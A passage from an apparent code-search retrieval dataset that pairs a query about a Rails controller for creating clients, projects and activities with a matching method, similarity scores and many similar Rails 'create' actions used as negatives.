"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end"
] |
[
"0.76715904",
"0.7656154",
"0.7489624",
"0.7466021",
"0.73890996",
"0.7364872",
"0.7301424",
"0.7294843",
"0.72752523",
"0.7170535",
"0.7137682",
"0.71017635",
"0.7045573",
"0.7040628",
"0.70351183",
"0.7032084",
"0.70251167",
"0.7017299",
"0.70083606",
"0.69274914",
"0.6911249",
"0.69019353",
"0.69011253",
"0.6883217",
"0.6877864",
"0.68770045",
"0.6876002",
"0.687434",
"0.6867277",
"0.68671507",
"0.68663424",
"0.6864268",
"0.68619895",
"0.6860338",
"0.68584067",
"0.685626",
"0.68545616",
"0.68529993",
"0.68469137",
"0.6844313",
"0.6843131",
"0.6831729",
"0.68303293",
"0.6828387",
"0.68272823",
"0.68270814",
"0.6826333",
"0.68247026",
"0.6823201",
"0.68230414",
"0.68230414",
"0.68230414",
"0.68230414",
"0.68230414",
"0.6818864",
"0.6812108",
"0.68093264",
"0.6809275",
"0.6808724",
"0.68013036",
"0.6795289",
"0.67930484",
"0.67915314",
"0.67875737",
"0.6787364",
"0.6785122",
"0.67834246",
"0.67834246",
"0.6781191",
"0.6777963",
"0.6777861",
"0.67747664",
"0.6768208",
"0.675996",
"0.6756129",
"0.67547727",
"0.67547727",
"0.67547727",
"0.67547727",
"0.6751112",
"0.6750994",
"0.67468536",
"0.67467976",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141"
] |
0.73521006
|
6
|
controller for creating clients/projects/activities
|
def create_client
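  # One admin endpoint handles creation for clients, projects, activities
  # and assignments; the params hash determines which record type is built.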
  if create_params[:client]
    Client.create(name: create_params[:client])
    flash[:notice] = 'Client: ' + create_params[:client] + ', created!'
    return redirect_to '/admin/list_clients' + '?client_name=' + create_params[:client]
  elsif create_params[:project]
    Client.find(create_params[:parent_id]).projects.create(name: create_params[:project])
    flash[:notice] = 'Project: ' + create_params[:project] + ', created!'
    return redirect_to request.referer + '#project' + Project.find_by_name(create_params[:project]).id.to_s
  elsif create_params[:activity]
    Project.find(create_params[:parent_id]).activities.create(name: create_params[:activity])
    flash[:notice] = 'Activity: ' + create_params[:activity] + ', created!'
    return redirect_to request.referer + '#activity' + Activity.find_by_name(create_params[:activity]).id.to_s
  elsif create_params[:user_id]
    # Assign a single user to a single activity; Assignment's uniqueness
    # validation makes create! raise when the pair already exists.
    begin
      Assignment.create!(user_id: create_params[:user_id], activity_id: create_params[:parent_id])
      flash[:notice] = 'Assigned user ' + User.find(create_params[:user_id]).handle + ' to activity ' + Activity.find(create_params[:parent_id]).name
      return redirect_to request.referer + '#ass' + Assignment.where(user_id: create_params[:user_id], activity_id: create_params[:parent_id]).first.id.to_s
    rescue
      flash[:error] = 'You can only assign a user once to a particular activity'
    end
  elsif create_params[:project_wide]
    # Assign a user to every activity in a project at once.
    begin
      Project.find(create_params[:parent_id]).activities.each do |activity|
        Assignment.create!(user_id: create_params[:project_wide], activity_id: activity.id)
      end
      flash[:notice] = 'Assigned user ' + User.find(create_params[:project_wide]).handle + ' to all activities in project ' + Project.find(create_params[:parent_id]).name
      return redirect_to request.referer + '#project' + create_params[:parent_id].to_s
    rescue
      flash[:error] = 'You can only assign a user once to a particular activity'
    end
  elsif create_params[:client_wide]
    # Assign a user to every activity under all of a client's projects.
    begin
      Client.find(create_params[:parent_id]).activities.each do |activity|
        Assignment.create!(user_id: create_params[:client_wide], activity_id: activity.id)
      end
      flash[:notice] = 'Assigned user ' + User.find(create_params[:client_wide]).handle + ' to all activities in client ' + Client.find(create_params[:parent_id]).name
      return redirect_to :back
    rescue
      flash[:error] = 'You can only assign a user once to a particular activity'
    end
  end
  redirect_to :back
rescue
  flash[:error] = 'There was an error'
  redirect_to :back
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create\n @project = @client.projects.new(params[:project])\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @client, notice: 'Project was successfully created.' }\n else\n format.html { render action: \"new\" }\n end\n end\n end",
"def create\n @project = current_user.projects.build(project_params)\n @project.user_id = current_user.id\n if @project.user.admin?\n @project.state = \"accepted\"\n else\n @project.state = \"pending\"\n end\n\n respond_to do |format|\n if @project.save\n activity = current_user.create_activity(@project, 'created')\n activity.user_id = current_user.id\n format.html { redirect_to @project, notice: 'Project request was sent.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @activities_project = ActivitiesProject.new(params[:activities_project])\n\n respond_to do |format|\n if @activities_project.save\n format.html { redirect_to(@activities_project, :notice => 'Activities project was successfully created.') }\n format.xml { render :xml => @activities_project, :status => :created, :location => @activities_project }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @activities_project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n client = params[:client].present? ? Client.new(params[:client]) : Client.find_by_id(params[:project].delete(:client_id))\n unless client.present?\n redirect_to projects_url, notice: \"Client is required.\" and return\n end\n \n @project = Project.new(params[:project])\n @project.client = client\n\n respond_to do |format|\n if @project.save\n Assignment.create({project_id: @project.id, user_id: current_user.id}.merge(params[:project][:assignment]))\n current_user.current_company.projects << @project\n current_user.current_company.clients << @project.client\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @client = Client.find(params[:client_id])\n @project = @client.projects.build(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to client_projects_path(@client), notice: 'Project was successfully created.' }\n format.json { render json: client_projects_path(@client), status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: client_projects_path(@client).errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project_activity = ProjectActivity.new(project_activity_params)\n\n respond_to do |format|\n if @project_activity.save\n format.html { redirect_to @project_activity, notice: 'Project activity was successfully created.' }\n format.json { render :show, status: :created, location: @project_activity }\n else\n format.html { render :new }\n format.json { render json: @project_activity.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n if @project.save\n redirect_to project_path(@project), notice: 'Project had been created successfully.'\n else\n find_people_list\n fetch_clients\n render action: \"new\"\n end\n end",
"def create\n @project = @projectable.projects.new(params[:project])\n\n respond_to do |format|\n if @project.save\n track_activity @project\n format.html { redirect_to [@projectable, @project], notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render layout: 'form', action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n\n if params[\"project\"][\"client_id\"] != \"\"\n @project.client = Client.find params[\"project\"][\"client_id\"]\n end\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Novo projeto cadastrado com sucesso.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = @client.projects.build(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to(client_projects_url(@client), notice: 'Project was successfully created.') }\n format.xml { render xml: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.xml { render xml: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.create(params[:project])\n \n if @project.save\n record_activity(\"created new project: \" + @project.id.to_s)\n redirect_to root_path, :notice => \"Project created successfully\"\n else\n render 'new'\n end\n end",
"def new\n @project = Project.new\n @project.client_id = params[:client_id]\n @project.created_by = current_user.id\n\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def create\n @project = Project.find(params[:project_id])\n if @project.nil? || @project.client.user != current_user\n respond_to do |format|\n format.html { redirect_to projects_path, :notice => \"Sorry, you don't have access to that project.\" }\n format.json { render :status => 404 }\n end\n end\n @task = Task.new(params[:task])\n @task.project = @project\n\n respond_to do |format|\n if @task.save\n format.html { redirect_to project_tasks_path(@project), :notice => 'Task was successfully created.' }\n format.json { render :json => @task, :status => :created, :location => @task }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @task.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @client = Client.find(params[:client_id])\n @project = @client.projects.build\n \n respond_with(@project)\n end",
"def create\n params[:project][:start_date] = DateTime.strptime(params[:project][:start_date], '%m/%d/%Y').strftime('%Y/%m/%d')\n params[:project][:end_date] = DateTime.strptime(params[:project][:end_date], '%m/%d/%Y').strftime('%Y/%m/%d')\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.save\n PublicActivity::Activity.create key: 'project.create', trackable: @project, company_id: @project.company_id, project_id: @project.id, owner: current_user\n format.html { redirect_to :back, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @project = Project.new(user_id: current_user.id)\n find_people_list\n fetch_clients\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def create\n @urlroot = Designax::Application.config.urlroot\n if params[:pk] == \"new\" and params[:name] == \"project_name\"\n project_name = params[:value]\n @project = Project.new()\n @project.project_name = project_name\n else\n @project = Project.new(params[:project])\n end\n\n respond_to do |format|\n if @project.save\n redirect_url = @urlroot + \"/projects\"\n response_url = { \"url\" => redirect_url }\n format.json { render json: response_url, status: 200 }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new_project\n if current_admin.present? || current_client.present?\n @project = Project.new\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n else\n redirect_to new_admin_session_path and return\n end\n end",
"def create\r\n\t\t\t@project = params[:id].present? ? Project.find(params[:id]) : Project.new(create_step: 0)\r\n\t\t\t\r\n\t\t\t# Author\r\n\t\t\tif @project.new_record?\r\n\t\t\t\tauthorize! :create, @project\r\n\t\t\telse\r\n\t\t\t\tauthorize! :edit, @project\r\n\t\t\tend\r\n\r\n\t\t\trender layout: 'layout_back'\r\n\t\tend",
"def create\n @project = Project.new(params[:project])\n #@project.assigned_users << current_user\n @project.updated_by = current_user.id\n respond_to do |format|\n if @project.valid1? and @project.save\n format.html { redirect_to client_projects_path(client_id: @project.client_id), notice: \"成功创建#{Project.model_name.human}\" }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n @project.type = params[:type][:id]\n @project.access = \"Private\"\n @user_name = params[:username]\n \n @user = current_user.luser\n @project.created_by = @user.name\n role = Role.find(:first, :conditions => {:name => \"Creator\"} )\n\n respond_to do |format|\n if @project.save\n luser_project = LuserProject.new \n luser_project.project_id = @project.id\n luser_project.luser_id = @user.id\n luser_project.role_id = role.id\n luser_project.save\n Activity.created_project(current_user.luser, @project)\n \n format.html { redirect_to project_url(@user_name, @project), notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created}\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.client && @project.save\n\n pm = ProjectParticipant.with_deleted.find_or_initialize_by(project_id: @project.id, user_id: current_user.id)\n pm.is_manager = true\n pm.restore! if pm.destroyed?\n pm.save\n\n format.html { redirect_to \"/\", notice: 'Project was successfully created.' }\n format.json { render json: @project.as_json(:include => [:client, :project_participants ]), status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n cmp = AzCompany.find(params[:az_project][:owner_id])\n @project = AzProject.create(params[:az_project][:name], cmp, current_user, params[:az_project][:public_access])\n\n @title = 'Создание нового сайта'\n\n respond_to do |format|\n if @project.id\n flash[:notice] = 'Проект успешно создан.'\n format.html { redirect_to(@project) }\n else\n format.html { render :template => 'az_projects/new', :owner_id => cmp.id }\n end\n end\n end",
"def create \n\t\t@project = Project.new(project_params)\n\t\t@project.creator = current_user.id\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @campaign = Campaign.find(params[:campaign_id])\n @project = @campaign.projects.create(params[:project])\n respond_to do |format|\n if @project.update_attributes(params[:project])\n format.html { redirect_to campaign_path(@campaign), notice: 'Project was successfully created.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.new(params[:project])\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @projects = current_user.projects\n @project = current_user.projects.new(project_params)\n\n respond_to do |format|\n if @projects << @project\n format.html { redirect_to user_projects_path(current_user), notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @projects = Project.all\n @project = Project.find_by_id(params[:project_id])\n if !@project.blank?\n @visit = Visit.where(user_id: current_user.id, visitable_id: @project.id, visitable_type: 'Project').first\n if !@visit.blank?\n @visit.destroy\n end\n Visit.create(user_id: current_user.id, visitable_id: @project.id, visitable_type: 'Project')\n @activity = Activity.create(user_id: current_user.id, activity_type: 'View', target_type: 'Project', target_id: @project.id)\n\n end\n end",
"def create\n @user = current_user\n @project = @user.projects.build(params[:project])\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\t\t@project = current_user.projects.new(project_params)\n\n\t\trespond_to do |format|\n\t\t\tif @project.save\n\t\t\t\tformat.json { render :show, status: :created }\n\t\t\telse\n\t\t\t\tformat.json { render json: @project.errors, status: :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def create\n @project = Project.new(:project_title => params[:project_title], :start_date => params[:startDate], :end_date => params[:endDate],\n :status => params[:project_status])\n\n @project.user_id = current_user.id\n\n\n respond_to do |format|\n if @project.save\n p \"pass on projects controller\"\n format.html { redirect_to @project}\n format.json { render json: \"ok\" }\n else\n p \"fail on projects controller\"\n end\n end\n\n\n end",
"def new_project\n @request = Request.new(data_type: :project)\n @request.build_contact\n @request.build_project\n @request.build_general_information\n\n render 'new'\n end",
"def new\n @project = @client.projects.build\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render xml: @project }\n end\n end",
"def create\n authorize Project\n\n @project = Project.new(project_params)\n @project.created_by = current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to projects_path, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @create_project = current_user.projects.build(params[:project])\n flash[:notice] = \"Project #{@create_project.description} successfully created\" if @create_project.save\n respond_with(@create_project, layout: !request.xhr?)\n end",
"def create\t\t\t\t\t\t\t\t\t# Creates record in db and redirects (porbably to index)\n\t\t@project = Project.new(projects_params)\t# Passes only title and desc.\n\n \trespond_to do |format|\t\t\t\t\t# All this is doing is rendering stuff in case of json\n \t\tif @project.save\n \t\tformat.html { redirect_to @project, notice: 'Created a new project!' }\n \t\tformat.json { render :show, status: :created, location: @project }\n \t\telse\n \t\tformat.html { render :new }\n \t\t\tformat.json { render json: @project.errors, status: :unprocessable_entity }\n \t\tend\n \tend\n\tend",
"def create\n @project = current_user.projects.new(project_params)\n\n respond_to do |format|\n if @project.save\n format.html {redirect_to \"/projects\", notice: \"Project was successfully created.\"}\n format.json {render :show, status: :created, location: @project}\n else\n format.html {render :new, status: :unprocessable_entity}\n format.json {render json: @project.errors, status: :unprocessable_entity}\n end\n end\n end",
"def create\n initiative = Initiative.find_by_id(project_params[:initiative_id])\n if initiative.nil?\n @project = Project.new(project_params)\n else\n @project = initiative.projects.build(project_params)\n end\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @board, notice: @project.name + ' was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n @project.status = \"Etat zero\"\n creator = current_user\n ProjectUser.create(:project => @project, :user => creator, :admin => true)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @partner_project = PartnerProject.new(params[:partner_project])\n\n respond_to do |format|\n if @partner_project.save\n format.html { redirect_to @partner_project, notice: 'Partner project was successfully created.' }\n format.json { render json: @partner_project, status: :created, location: @partner_project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @partner_project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @client_name = params[:id]\n unless @client_name.nil?\n client = Client.find_by_name(@client_name)\n @project = client.projects.new\n end\n render :layout => false\n end",
"def new\n propose_nr = Integer(Project.order(\"nr desc\").first.nr) + 1\n @project = Project.new(:nr => propose_nr, :active => true)\n @project.tasks.new(:name => \"Project Mgmt\", :description => \"\")\n @project.tasks.new(:name => \"Pre-P\", :description => \"Moodboards | Examining project data, plans, briefing, etc.\")\n @project.tasks.new(:name => \"Web\", :description => \"Flatfinder/Boligvelger (eve-Estate) | CMS/Website (eve-Publisher) | Landingpage\")\n @project.tasks.new(:name => \"Undividable 3D work for exteriors\", :description => \"Modeling/texturing of buildings and their surroundings. Populating/detailing with plants, outdoor furniture, traffic, etc.\")\n @project.tasks.new(:name => \"Undividable 3D work for interiors\", :description => \"Modeling/texturing of X apartments. Setting up furniture, accessories, decoration according to moodboards.\")\n @project.tasks.new(:name => \"#{propose_nr}-01_e\", :description => \"Scene setup, lighting and detail adjustments, rendering with subsequent post-production/compositing.\")\n @project.tasks.order(:name)\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def create\n @project = Project.new.new_project_steps @current_user, project_params\n respond_to do |format|\n if @project.save\n @current_user.projects << @project\n @current_user.save\n format.html { redirect_to root_path, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render partial: 'form' }\n format.js { render partial: 'dashboard_new' }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @project_activities = ProjectActivity.all\n end",
"def create\n @project = current_user.projects.new(project_params)\n authorize_action_for @project\n @project.category_id = category_params\n respond_to do |format|\n if @project.save\n @project.configure_contributors(contributor_params)\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n @categories = Category.where(user_id: nil) + current_user.categories\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @project = Project.new\n @project.tasks.build\n @categories = Category.parents_only\n\n respond_to do |format|\n format.html # new.html.erb\n format.json {\n \trender :json => {\n \t :projects => @proejcts,\n \t :categories => @categories\n \t}\n }\n end\n end",
"def create\n @project = Project.new(project_params)\n authorize! :create, @project\n @project.user_id ||= current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @client = Client.new\n 1.times { @client.projects.build }\n 1.times { @client.notes.build }\n respond_with(@client)\n end",
"def create\n project_params[:owner_id] = current_user.id if project_params[:owner_id].nil? or not current_user.is_admin?\n @project = Project.new(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to projects_url, notice: 'Project was successfully created.' }\n format.json { head :no_content }\n else\n format.html { render action: 'new' }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.build(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: \"Project was successfully created.\" }\n User.find(current_user.id).projects << Project.find(@project.id)\n @projects_user = ProjectsUser.find_by(user_id: current_user.id, project_id: @project.id)\n format.json { render :show, status: :created, location: @project }\n\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n current_user.projects << @project\n authorize @project\n if @project.save\n redirect_to @project, notice: I18n.t('flash.actions.project.create.notice')\n else\n render :new \n end\n end",
"def create\n @project = Project.new(params[:project])\n<<<<<<< HEAD:app/controllers/projects_controller.rb\n handle_disciplines_projects\n=======\n>>>>>>> 336471e6be257cf55c9afa2a65f928fde34e41fe:app/controllers/projects_controller.rb\n\n respond_to do |format|\n if @project.save\n flash[:notice] = 'Project was successfully created.'\n format.html { redirect_to(@project) }\n format.xml { render :xml => @project, :status => :created, :location => @project }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @activities_project = ActivitiesProject.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @activities_project }\n end\n end",
"def create\n @dev_activity = current_user.dev_activities.create(dev_activity_params)\n\n respond_to do |format|\n if @dev_activity.save\n format.html { redirect_to user_dev_activities_path(current_user), notice: 'The Development Activity was successfully created.' }\n format.json { render action: 'show', status: :created, location: @dev_activity }\n else\n format.html { render action: 'new' }\n format.json { render json: @dev_activity.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.create project_params\n current_user.memberships.create(\n project_id: @project.id,\n owner_at: Time.now\n )\n\n if @project.save\n render 'projects/create', status: 201\n else\n render 'projects/error', status: 422\n end\n end",
"def create\n @new_project = Project.new(params[:project])\n @new_project.created_by = current_user.login\n\n respond_to do |format|\n if @new_project.save\n flash[:notice] = 'Project was successfully created.'\n format.html { redirect_to(project_path(@new_project)) }\n format.xml { render :xml => @project, :status => :created, :location => @new_project }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @new_project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.created_by = current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n respond_to do |format|\n if project.save\n format.html { redirect_to project, notice: 'Project was successfully created.' }\n format.json { render json: project, status: ':created', location: project }\n else\n format.html { render action: 'new' }\n format.json { render json: project.errors, status: ':unprocessable_entity' }\n end\n end\n end",
"def new\n @campaign = Campaign.find(params[:campaign_id])\n @project = @campaign.projects.new(params[:project])\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def create\n @project = Project.new(params[:project])\n\t\t@project.user_id =current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.creator = current_user\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n else\n format.html { render :new }\n end\n end\n end",
"def create\n #byebug\n @project = Project.new(create_params)\n @project.user_id = @current_user.id\n @project.save\n #@project = Project.create(name_project: \"prueba\", subsidy: true, parking: true, user_id: @current_user.id)\n #byebug\n render json: @project, status: :created\n end",
"def create\n @dashboard_project = current_user.build_project(dashboard_project_params)\n\n respond_to do |format|\n if @dashboard_project.save\n format.html { redirect_to dashboard_project_path(@dashboard_project), notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @dashboard_project }\n else\n format.html { render :new }\n format.json { render json: @dashboard_project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n @project.roles.build name: Role.role_types.first,\n user: User.find(session[:id])\n begin \n n_invitations = @project.add_colaborators\n notice = 'Project was successfully created. '\n \n notice += '1 user has been automatically added to the project.' if n_invitations == 1\n notice += n_invitations.to_s + ' users have been automatically added to the project.' if n_invitations > 1\n\n rescue\n redirect_to @project, notice: \"An error occurred. You may have entered invalid github information.\"\n return\n end \n \n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: notice }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\t\t@project = Project.new(params[:project].merge({:user_id => present_user.id}))\n\t\tmake_breadcrumbs\n\n\t\trespond_to do |format|\n\t\t\tif @project.save\n\t\t\t\tformat.html { redirect_to @project, notice: t('app.projects.created') }\n\t\t\t\tformat.json { render json: @project, status: :created, location: @project }\n\t\t\telse\n\t\t\t\tformat.html { render action: \"new\" }\n\t\t\t\tformat.json { render json: @project.errors, status: :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def create\n\n @project = Project.new(project_params)\n @project.user_id = current_user.id\n\n respond_to do |format|\n if @project.save\n\n format.html { redirect_to @project, success: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.save\n flash[:notice] = 'Project was successfully created.'\n format.html { redirect_to(:action=>'show', :ids=>@project) }\n format.xml { render :xml => @project, :status => :created, :location => @project }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.build(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to projects_path, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.save\n @project.user_projects.create(:user_id => current_user.id, :status => true, :role => 1)\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #cid = params[:project].delete(:Client)\n #puts cid.to_s\n #puts params[:planned_efforts_days].to_s + \", \" + params[:planned_efforts_hours].to_s\n planned_eff = params[:planned_efforts_days].to_i*86400 + params[:planned_efforts_hours].to_i*3600\n #puts planned_eff.to_s\n @project = Project.new(params[:project])\n #@project.Client_id = cid\n @project.planned_efforts = planned_eff\n\n respond_to do |format|\n if @project.save\n #also create membership\n m = Membership.new(:user_id => current_user.id, :project_id => @project.id, :status => 3)\t# status => 3: current_user is owner of project\n if m.save\n format.html { redirect_to projects_url, notice: 'Project was successfully created.' }\n format.js\n format.json { render json: @project, status: :created, location: @project }\n end\n else\n format.html { render action: \"new\" }\n format.js { render :action => 'new' }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n do_new_resource\n get_project_site\n do_set_attributes\n do_authorize_instance\n\n respond_new\n end",
"def create\n @project = Project.new(project_params)\n @project.owner = current_user unless @project.owner\n if @project.save\n render :show, status: :created, location: @project\n else\n render json: @project.errors, status: :unprocessable_entity\n end\n end",
"def create\n @project = Project.new(params[:project])\n @categories = Category.parents_only\n\n respond_to do |format|\n if @project.save\n flash[:success] = 'Project was successfully created.'\n format.html { redirect_to project_path(@project) }\n format.json { render json: @project, status: :created, location: project_path(@project) }\n else\n format.html { render action: \"new\" }\n format.json {\n \trender json: {\n \t\t:'project.errors' => @project.errors,\n \t\t:categories => @categories\n \t},\n \tstatus: :unprocessable_entity\n }\n end\n end\n end",
